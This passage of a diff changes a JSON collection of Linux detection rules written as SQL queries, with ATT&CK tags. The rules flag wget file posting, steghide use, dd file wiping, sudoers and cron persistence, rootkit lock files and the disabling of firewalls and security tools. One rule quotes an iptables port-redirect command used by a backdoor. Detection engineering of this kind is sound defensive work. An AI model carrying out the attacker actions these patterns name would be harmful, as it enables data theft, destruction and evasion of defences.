"lnx_auditd_system_info_discovery.yml" + "filename": "lnx_auditd_coinminer.yml" }, { - "title": "Loading of Kernel Module via Insmod", - "id": "106d7cbd-80ff-4985-b682-a7043e5acb72", - "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", - "author": "Pawel Mazur", + "title": "Modify System Firewall", + "id": "323ff3f5-0013-4847-bbd4-250b5edb62cc", + "description": "Detects the removal of system firewall rules. 
Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.\nDetection rules that match only on the disabling of firewalls will miss this.\n", + "author": "IAI", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.006" + "attack.t1562.004", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'SYSCALL' AND comm = 'insmod' AND exe = '/usr/bin/kmod')" + "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'iptables' AND a1 LIKE '%DROP%' ESCAPE '\\') OR (type = 'EXECVE' AND a0 = 'firewall-cmd' AND a1 LIKE '%remove%' ESCAPE '\\') OR (type = 'EXECVE' AND a0 = 'ufw' AND a1 LIKE '%delete%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_load_module_insmod.yml" + "filename": "lnx_auditd_modify_system_firewall.yml" }, { - "title": "Clipboard Collection with Xclip Tool - Auditd", - "id": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", - "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "title": "Steganography Hide Files with Steghide", + "id": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", + "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", "author": "Pawel Mazur", "tags": [ - "attack.collection", - "attack.t1115" + "attack.defense_evasion", + "attack.t1027.003" ], "falsepositives": [ - "Legitimate usage of xclip tools" + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'xclip' AND a1 IN ('-selection', '-sel') AND a2 IN ('clipboard', 'clip') AND a3 = '-o')" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'steghide' 
AND a1 = 'embed' AND a2 IN ('-cf', '-ef') AND a4 IN ('-cf', '-ef'))" ], - "filename": "lnx_auditd_clipboard_collection.yml" + "filename": "lnx_auditd_steghide_embed_steganography.yml" }, { "title": "Linux Network Service Scanning - Auditd", 
@@ -662,548 +679,608 @@ "filename": "lnx_auditd_network_service_scanning.yml" }, { - "title": "Data Exfiltration with Wget", - "id": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", - "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", + "title": "Steganography Extract Files with Steghide", + "id": "a5a827d9-1bbe-4952-9293-c59d897eb41b", + "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", "author": "Pawel Mazur", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1027.003" ], "falsepositives": [ - "Legitimate usage of wget utility to post a file" + "Unknown" + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'steghide' AND a1 = 'extract' AND a2 = '-sf' AND (a3 LIKE '%.jpg' ESCAPE '\\' OR a3 LIKE '%.png' ESCAPE '\\'))" + ], + "filename": "lnx_auditd_steghide_extract_steganography.yml" + }, + { + "title": "Overwriting the File with Dev Zero or Null", + "id": "37222991-11e9-4b6d-8bdf-60fbe48f753e", + "description": "Detects overwriting (effectively wiping/deleting) of a file.", + "author": "Jakob Weinzettl, oscd.community", + "tags": [ + "attack.impact", + "attack.t1485" + ], + "falsepositives": [ + "Appending null bytes to files.", + "Legitimate overwrite of files." + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%dd%' ESCAPE '\\' AND (a1 LIKE '%if=/dev/null%' ESCAPE '\\' OR a1 LIKE '%if=/dev/zero%' ESCAPE '\\'))" + ], + "filename": "lnx_auditd_dd_delete_file.yml" + }, + { + "title": "Creation Of An User Account", + "id": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", + "description": "Detects the creation of a new user account. 
Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "author": "Marie Euler, Pawel Mazur", + "tags": [ + "attack.t1136.001", + "attack.persistence" + ], + "falsepositives": [ + "Admin activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'wget' AND a1 LIKE '--post-file=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((type = 'SYSCALL' AND exe LIKE '%/useradd' ESCAPE '\\') OR type LIKE 'ADD\\_USER' ESCAPE '\\')" + ], + "filename": "lnx_auditd_create_account.yml" + }, + { + "title": "System and Hardware Information Discovery", + "id": "1f358e2e-cb63-43c3-b575-dfb072a6814f", + "description": "Detects system information discovery commands", + "author": "Ömer Günal, oscd.community", + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "falsepositives": [ + "Legitimate administration activities" + ], + "level": "informational", + "rule": [ + "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/sys/class/dmi/id/bios\\_version' ESCAPE '\\' OR name LIKE '/sys/class/dmi/id/product\\_name' ESCAPE '\\' OR name LIKE '/sys/class/dmi/id/chassis\\_vendor' ESCAPE '\\' OR name LIKE '/proc/scsi/scsi' ESCAPE '\\' OR name LIKE '/proc/ide/hd0/model' ESCAPE '\\' OR name LIKE '/proc/version' ESCAPE '\\' OR name LIKE '/etc/%version' ESCAPE '\\' OR name LIKE '/etc/%release' ESCAPE '\\' OR name LIKE '/etc/issue' ESCAPE '\\'))" ], - "filename": "lnx_auditd_data_exfil_wget.yml" + "filename": "lnx_auditd_system_info_discovery2.yml" }, { - "title": "Program Executions in Suspicious Folders", - "id": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", - "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Auditing Configuration Changes on Linux Host", + "id": "977ef627-4539-4875-adf4-ed8f780c4922", + "description": "Detect changes in auditd configuration files", + 
"author": "Mikhail Larin, oscd.community", "tags": [ - "attack.t1587", - "attack.t1584", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1562.006" ], "falsepositives": [ - "Admin activity (especially in /tmp folders)", - "Crazy web applications" + "Legitimate administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'SYSCALL' AND (exe LIKE '/tmp/%' ESCAPE '\\' OR exe LIKE '/var/www/%' ESCAPE '\\' OR exe LIKE '/home/%/public\\_html/%' ESCAPE '\\' OR exe LIKE '/usr/local/apache2/%' ESCAPE '\\' OR exe LIKE '/usr/local/httpd/%' ESCAPE '\\' OR exe LIKE '/var/apache/%' ESCAPE '\\' OR exe LIKE '/srv/www/%' ESCAPE '\\' OR exe LIKE '/home/httpd/html/%' ESCAPE '\\' OR exe LIKE '/srv/http/%' ESCAPE '\\' OR exe LIKE '/usr/share/nginx/html/%' ESCAPE '\\' OR exe LIKE '/var/lib/pgsql/data/%' ESCAPE '\\' OR exe LIKE '/usr/local/mysql/data/%' ESCAPE '\\' OR exe LIKE '/var/lib/mysql/%' ESCAPE '\\' OR exe LIKE '/var/vsftpd/%' ESCAPE '\\' OR exe LIKE '/etc/bind/%' ESCAPE '\\' OR exe LIKE '/var/named/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/etc/audit/%' ESCAPE '\\' OR name LIKE '/etc/libaudit.conf' ESCAPE '\\' OR name LIKE '/etc/audisp/%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_susp_exe_folders.yml" + "filename": "lnx_auditd_auditing_config_change.yml" }, { - "title": "CVE-2021-3156 Exploitation Attempt Bruteforcing", - "id": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing.\nrequired to trigger the heap-based buffer overflow.\n", - "author": "Bhabesh Raj", + "title": "Suspicious Commands Linux", + "id": "1543ae20-cbdf-4ec1-8d12-7664d667a825", + "description": "Detects relevant commands often related to malware or hacking activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - 
"attack.privilege_escalation", - "attack.t1068", - "cve.2021.3156" + "attack.execution", + "attack.t1059.004" ], "falsepositives": [ - "Unknown" + "Admin activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM (SELECT *,count(*) AS agg FROM logs WHERE (type = 'SYSCALL' AND exe = '/usr/bin/sudoedit') GROUP BY host) WHERE agg > 50" + "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'chmod' AND a1 = '777') OR (type = 'EXECVE' AND a0 = 'chmod' AND a1 = 'u+s') OR (type = 'EXECVE' AND a0 = 'cp' AND a1 = '/bin/ksh') OR (type = 'EXECVE' AND a0 = 'cp' AND a1 = '/bin/sh'))" ], - "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml" + "filename": "lnx_auditd_susp_cmds.yml" }, { - "title": "Modify System Firewall", - "id": "323ff3f5-0013-4847-bbd4-250b5edb62cc", - "description": "Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.\nDetection rules that match only on the disabling of firewalls will miss this.\n", - "author": "IAI", + "title": "Masquerading as Linux Crond Process", + "id": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", + "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.t1562.004", - "attack.defense_evasion" - ], - "falsepositives": [ - "Legitimate admin activity" + "attack.defense_evasion", + "attack.t1036.003" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'iptables' AND a1 LIKE '%DROP%' ESCAPE '\\') OR (type = 'EXECVE' AND a0 = 'firewall-cmd' AND a1 LIKE '%remove%' ESCAPE '\\') OR (type = 'EXECVE' AND a0 = 'ufw' AND a1 LIKE '%delete%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (type = 'execve' AND 
a0 = 'cp' AND a1 = '-i' AND a2 = '/bin/sh' AND a3 LIKE '%/crond' ESCAPE '\\')" ], - "filename": "lnx_auditd_modify_system_firewall.yml" + "filename": "lnx_auditd_masquerading_crond.yml" }, { - "title": "Auditing Configuration Changes on Linux Host", - "id": "977ef627-4539-4875-adf4-ed8f780c4922", - "description": "Detect changes in auditd configuration files", - "author": "Mikhail Larin, oscd.community", + "title": "Triple Cross eBPF Rootkit Default Persistence", + "id": "1a2ea919-d11d-4d1e-8535-06cda13be20f", + "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1562.006" + "attack.t1053.003" ], "falsepositives": [ - "Legitimate administrative activity" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/etc/audit/%' ESCAPE '\\' OR name LIKE '/etc/libaudit.conf' ESCAPE '\\' OR name LIKE '/etc/audisp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%ebpfbackdoor' ESCAPE '\\'" ], - "filename": "lnx_auditd_auditing_config_change.yml" + "filename": "file_event_lnx_triple_cross_rootkit_persistence.yml" }, { - "title": "Possible Coin Miner CPU Priority Param", - "id": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", - "description": "Detects command line parameter very often used with coin miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Sudoers Files", + "id": "ddb26b76-4447-4807-871f-1b035b2bfa5d", + "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.persistence", + "attack.t1053.003" ], 
"falsepositives": [ - "Other tools that use a --cpu-priority flag" + "Creation of legitimate files in sudoers.d folder part of administrator work" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (a1 LIKE '--cpu-priority%' ESCAPE '\\' OR a2 LIKE '--cpu-priority%' ESCAPE '\\' OR a3 LIKE '--cpu-priority%' ESCAPE '\\' OR a4 LIKE '--cpu-priority%' ESCAPE '\\' OR a5 LIKE '--cpu-priority%' ESCAPE '\\' OR a6 LIKE '--cpu-priority%' ESCAPE '\\' OR a7 LIKE '--cpu-priority%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE '/etc/sudoers.d/%' ESCAPE '\\'" ], - "filename": "lnx_auditd_coinminer.yml" + "filename": "file_event_lnx_persistence_sudoers_files.yml" }, { - "title": "Data Compressed", - "id": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "author": "Timur Zinniatullin, oscd.community", + "title": "Linux Doas Conf File Creation", + "id": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", + "description": "Detects the creation of doas.conf file in linux host platform.", + "author": "Sittikorn S, Teoderick Contreras", "tags": [ - "attack.exfiltration", - "attack.t1560.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Legitimate use of archiving tools by legitimate user." 
+ "Unlikely" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((type = 'execve' AND a0 = 'zip') OR (type = 'execve' AND a0 = 'gzip' AND a1 = '-f') OR (type = 'execve' AND a0 = 'tar' AND a1 LIKE '%-c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%/etc/doas.conf' ESCAPE '\\'" ], - "filename": "lnx_auditd_data_compressed.yml" + "filename": "file_event_lnx_doas_conf_creation.yml" }, { - "title": "BPFDoor Abnormal Process ID or Lock File Accessed", - "id": "808146b2-9332-4d78-9416-d7e47012d83d", - "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", - "author": "Rafal Piasecki", + "title": "Triple Cross eBPF Rootkit Default LockFile", + "id": "c0239255-822c-4630-b7f1-35362bcb8f44", + "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106", - "attack.t1059" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'PATH' AND name IN ('/var/run/haldrund.pid', '/var/run/xinetd.lock', '/var/run/kdevrund.pid'))" + "SELECT * FROM logs WHERE TargetFilename = '/tmp/rootlog'" ], - "filename": "lnx_auditd_bpfdoor_file_accessed.yml" + "filename": "file_event_lnx_triple_cross_rootkit_lock_file.yml" }, { - "title": "Password Policy Discovery", - "id": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", - "description": "Detects password policy discovery commands", - "author": "Ömer Günal, oscd.community, Pawel Mazur", + "title": "Persistence Via Cron Files", + "id": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", + "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - 
"attack.discovery", - "attack.t1201" + "attack.persistence", + "attack.t1053.003" ], "falsepositives": [ - "Legitimate administration activities" + "Any legitimate cron file." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/pam.d/common-password', '/etc/security/pwquality.conf', '/etc/pam.d/system-auth', '/etc/login.defs')) OR (type = 'EXECVE' AND a0 = 'chage' AND a1 IN ('--list', '-l')) OR (type = 'EXECVE' AND a0 = 'passwd' AND a1 IN ('-S', '--status')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '/etc/cron.d/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.daily/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.hourly/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.monthly/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.weekly/%' ESCAPE '\\' OR TargetFilename LIKE '/var/spool/cron/crontabs/%' ESCAPE '\\') OR (TargetFilename LIKE '%/etc/cron.allow%' ESCAPE '\\' OR TargetFilename LIKE '%/etc/cron.deny%' ESCAPE '\\' OR TargetFilename LIKE '%/etc/crontab%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_password_policy_discovery.yml" + "filename": "file_event_lnx_persistence_cron_files.yml" }, { - "title": "Split A File Into Pieces - Linux", - "id": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", - "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", - "author": "Igor Fits, oscd.community", + "title": "Remove Immutable File Attribute", + "id": "34979410-e4b5-4e5d-8cfb-389fdff05c12", + "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1030" + "attack.defense_evasion", + "attack.t1222.002" ], "falsepositives": [ - "Legitimate administrative activity" + "Administrator interacting with immutable files (e.g. for instance backups)." 
], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'SYSCALL' AND comm = 'split')" + "SELECT * FROM logs WHERE (Image LIKE '%/chattr' ESCAPE '\\' AND CommandLine LIKE '% -i %' ESCAPE '\\')" ], - "filename": "lnx_auditd_split_file_into_pieces.yml" + "filename": "proc_creation_lnx_chattr_immutable_removal.yml" }, { - "title": "System and Hardware Information Discovery", - "id": "1f358e2e-cb63-43c3-b575-dfb072a6814f", - "description": "Detects system information discovery commands", - "author": "Ömer Günal, oscd.community", + "title": "Chmod Suspicious Directory", + "id": "6419afd1-3742-47a5-a7e6-b50386cd15f8", + "description": "Detects chmod targeting files in abnormal directory paths.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.defense_evasion", + "attack.t1222.002" ], "falsepositives": [ - "Legitimate administration activities" + "Admin changing file permissions." ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/sys/class/dmi/id/bios\\_version' ESCAPE '\\' OR name LIKE '/sys/class/dmi/id/product\\_name' ESCAPE '\\' OR name LIKE '/sys/class/dmi/id/chassis\\_vendor' ESCAPE '\\' OR name LIKE '/proc/scsi/scsi' ESCAPE '\\' OR name LIKE '/proc/ide/hd0/model' ESCAPE '\\' OR name LIKE '/proc/version' ESCAPE '\\' OR name LIKE '/etc/%version' ESCAPE '\\' OR name LIKE '/etc/%release' ESCAPE '\\' OR name LIKE '/etc/issue' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/chmod' ESCAPE '\\' AND (CommandLine LIKE '%/tmp/%' ESCAPE '\\' OR CommandLine LIKE '%/.Library/%' ESCAPE '\\' OR CommandLine LIKE '%/etc/%' ESCAPE '\\' OR CommandLine LIKE '%/opt/%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_system_info_discovery2.yml" + "filename": "proc_creation_lnx_susp_chmod_directories.yml" }, { - "title": "Screen Capture with Import Tool", - "id": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", 
- "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", - "author": "Pawel Mazur", + "title": "Linux Webshell Indicators", + "id": "818f7b24-0fba-4c49-a073-8b755573b9c7", + "description": "Detects suspicious sub processes of web server processes", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Legitimate use of screenshot utility" + "Web applications that invoke Linux command line tools" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'import') AND ((a1 = '-window' AND a2 = 'root' AND (a3 LIKE '%.png' ESCAPE '\\' OR a3 LIKE '%.jpg' ESCAPE '\\' OR a3 LIKE '%.jpeg' ESCAPE '\\')) OR (a1 LIKE '%.png' ESCAPE '\\' OR a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.jpeg' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((ParentImage LIKE '%/httpd' ESCAPE '\\' OR ParentImage LIKE '%/lighttpd' ESCAPE '\\' OR ParentImage LIKE '%/nginx' ESCAPE '\\' OR ParentImage LIKE '%/apache2' ESCAPE '\\' OR ParentImage LIKE '%/node' ESCAPE '\\' OR ParentImage LIKE '%/caddy' ESCAPE '\\') OR (ParentCommandLine LIKE '%/bin/java%' ESCAPE '\\' AND ParentCommandLine LIKE '%tomcat%' ESCAPE '\\') OR (ParentCommandLine LIKE '%/bin/java%' ESCAPE '\\' AND ParentCommandLine LIKE '%websphere%' ESCAPE '\\')) AND (Image LIKE '%/whoami' ESCAPE '\\' OR Image LIKE '%/ifconfig' ESCAPE '\\' OR Image LIKE '%/ip' ESCAPE '\\' OR Image LIKE '%/bin/uname' ESCAPE '\\' OR Image LIKE '%/bin/cat' ESCAPE '\\' OR Image LIKE '%/bin/crontab' ESCAPE '\\' OR Image LIKE '%/hostname' ESCAPE '\\' OR Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\' OR Image LIKE '%/pwd' ESCAPE '\\' OR Image LIKE '%/route' ESCAPE '\\'))" 
], - "filename": "lnx_auditd_screencapture_import.yml" + "filename": "proc_creation_lnx_webshell_detection.yml" }, { - "title": "Bpfdoor TCP Ports Redirect", - "id": "70b4156e-50fc-4523-aa50-c9dddf1993fc", - "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", - "author": "Rafal Piasecki", + "title": "Linux Base64 Encoded Shebang In CLI", + "id": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", + "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1140" ], "falsepositives": [ - "Legitimate ports redirect" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 LIKE '%iptables' ESCAPE '\\' AND a1 = '-t' AND a2 = 'nat') AND (logs MATCH ('\"--to-ports 42\" OR \"--to-ports 43\"')))" + "SELECT * FROM logs WHERE (CommandLine LIKE '%IyEvYmluL2Jhc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL2Rhc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL3pza%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL2Zpc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL3No%' ESCAPE '\\')" ], - "filename": "lnx_auditd_bpfdoor_port_redirect.yml" + "filename": "proc_creation_lnx_base64_shebang_cli.yml" }, { - "title": "Modification of ld.so.preload", - "id": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", - "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Connection Proxy", + "id": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", + "description": "Detects setting proxy configuration", + "author": "Ömer Günal", "tags": [ "attack.defense_evasion", - "attack.t1574.006" + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate administration activities" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type = 'PATH' AND name = '/etc/ld.so.preload')" + "SELECT * FROM logs WHERE (CommandLine LIKE '%http\\_proxy=%' ESCAPE '\\' OR CommandLine LIKE '%https\\_proxy=%' ESCAPE '\\')" ], - "filename": "lnx_auditd_ld_so_preload_mod.yml" + "filename": "proc_creation_lnx_proxy_connection.yml" }, { - "title": "Steganography Hide Files with Steghide", - "id": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", - "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", - "author": "Pawel Mazur", + "title": "Apt GTFOBin Abuse - Linux", + "id": "bb382fd5-b454-47ea-a264-1828e4c766d6", + "description": "Detects usage of \"apt\" and \"apt-get\" as a GTFOBin to execute and proxy command and binary execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.003" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'steghide' AND a1 = 'embed' AND a2 IN ('-cf', '-ef') AND a4 IN ('-cf', '-ef'))" + "SELECT * FROM logs WHERE ((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND CommandLine LIKE '%APT::Update::Pre-Invoke::=%' ESCAPE '\\')" ], - "filename": "lnx_auditd_steghide_embed_steganography.yml" + "filename": "proc_creation_lnx_gtfobin_apt.yml" }, { - "title": "Clipboard Collection of Image Data with Xclip Tool", - "id": 
"f200dc3f-b219-425d-a17e-c38467364816", - "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "author": "Pawel Mazur", + "title": "Disabling Security Tools", + "id": "e3a8a052-111f-4606-9aee-f28ebeb76776", + "description": "Detects disabling security tools", + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "tags": [ - "attack.collection", - "attack.t1115" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage of xclip tools" + "Legitimate administration activities" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'xclip' AND a1 IN ('-selection', '-sel') AND a2 IN ('clipboard', 'clip') AND a3 = '-t' AND a4 LIKE 'image/%' ESCAPE '\\' AND a5 = '-o')" + "SELECT * FROM logs WHERE ((Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%iptables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%ip6tables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%iptables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%ip6tables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%firewalld%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%firewalld%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND 
CommandLine LIKE '%off%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%cbdaemon%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (Image LIKE '%/setenforce' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%falcon-sensor%' ESCAPE '\\') OR (Image LIKE '%/systemctl' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\' AND CommandLine LIKE '%falcon-sensor%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_clipboard_image_collection.yml" + "filename": "proc_creation_lnx_security_tools_disabling.yml" }, { - "title": "Screen Capture with Xwd", - "id": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", - "description": "Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", - "author": "Pawel Mazur", + "title": "Mount Execution With Hidepid Parameter", + "id": "ec52985a-d024-41e3-8ff6-14169039a0b3", + "description": "Detects execution of the \"mount\" command 